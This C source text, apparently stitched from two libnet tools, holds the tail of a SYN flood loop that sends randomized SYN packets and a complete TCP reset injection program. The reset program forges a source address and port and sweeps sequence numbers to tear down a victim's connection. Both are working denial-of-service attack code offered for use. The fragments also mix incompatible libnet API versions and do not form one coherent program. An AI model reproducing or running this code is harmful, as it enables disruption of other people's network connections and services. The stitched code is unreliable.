libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // source TCP port (random) dest_port, // destination TCP port libnet_get_prand(LIBNET_PRu32), // sequence number (randomized) libnet_get_prand(LIBNET_PRu32), // acknowledgement number (randomized) TH_SYN, // control flags (SYN flag set only) libnet_get_prand(LIBNET_PRu16), // window size (randomized) 0, // urgent pointer NULL, // payload (none) 0, // payload length packet + LIBNET_IP_H); // packet header memory if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1) libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n"); byte_count = libnet_write_ip(network, packet, packet_size); // inject packet if (byte_count < packet_size) libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written. (%d of %d bytes)", byte_count, packet_size); usleep(FLOOD_DELAY); // wait for FLOOD_DELAY milliseconds } libnet_destroy_packet(&packet); // free packet memory if (libnet_close_raw_sock(network) == -1) // close the network interface libnet_error(LIBNET_ERR_WARNING, "can't close network interface."); return 0; }
int main(int argc, char **argv) { int c, build_ip, opt, win = 1000, timeout = 10000; unsigned short src_port = 0, dst_port = 0; unsigned long src_ip = 0, dst_ip = 0, seq = 0; libnet_t *l; libnet_ptag_t tcp, ip; struct libnet_stats stat; char errbuf[LIBNET_ERRBUF_SIZE]; memset(&stat, 0, sizeof(stat)); if ((l = libnet_init(LIBNET_RAW4, NULL, errbuf)) == NULL) { fprintf(stderr, "Libnet_init error: %s\n", errbuf); exit(-1); } while ((opt = getopt(argc, argv, "s:d:p:q:n:w:t:h")) != -1) switch (opt) { case 's': src_ip = libnet_name2addr4(l, optarg, LIBNET_DONT_RESOLVE); break; case 'd': dst_ip = libnet_name2addr4(l, optarg, LIBNET_DONT_RESOLVE); break; case 'p': src_port = atoi(optarg); break; case 'q': dst_port = atoi(optarg); break; case 'n': seq = strtoul(optarg, NULL, 0); break; case 'w': win = atoi(optarg); break; case 't': timeout = atoi(optarg); break; case 'h': case '?': usage(argv[0]); } if (optind < argc) usage(argv[0]); if (!src_ip || !dst_ip || !src_port || !dst_port) usage(argv[0]); if (!seq) { libnet_seed_prand(l); seq = libnet_get_prand(LIBNET_PRu32); } for (tcp = LIBNET_PTAG_INITIALIZER, build_ip = 1; seq < 4294967296 - win; seq += win) { tcp = libnet_build_tcp( src_port, /* source port */ dst_port, /* destination port */ seq, /* sequence number */ 0, /* acknowledgement num */ TH_RST, /* control flags */ 31337, /* window size */ 0, /* checksum */ 0, /* urgent pointer */ LIBNET_TCP_H, /* TCP packet size */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ tcp); /* libnet id */ if (tcp == -1) { fprintf(stderr, "Libnet_build_tcp error: %s\n", libnet_geterror(l)); goto bad; } if (build_ip) { build_ip = 0; ip = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_TCP_H, /* length */ 0, /* TOS */ 666, /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_TCP, /* protocol */ 0, /* checksum */ src_ip, /* source IP */ dst_ip, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (ip == -1) { fprintf(stderr, "Libnet_build_ipv4 error: %s\n", libnet_geterror(l)); goto bad; } } if ((c = libnet_write(l)) == -1) { fprintf(stderr, "Libnet_write error: %s\n", libnet_geterror(l)); goto bad; } usleep(timeout); } libnet_stats(l, &stat); fprintf(stderr, "Packets sent: %d (%d bytes)\n" "Packet errors: %d\n", stat.packets_sent, stat.bytes_written, stat.packet_errors); libnet_destroy(l); exit(0); bad: libnet_destroy(l); exit(-1); }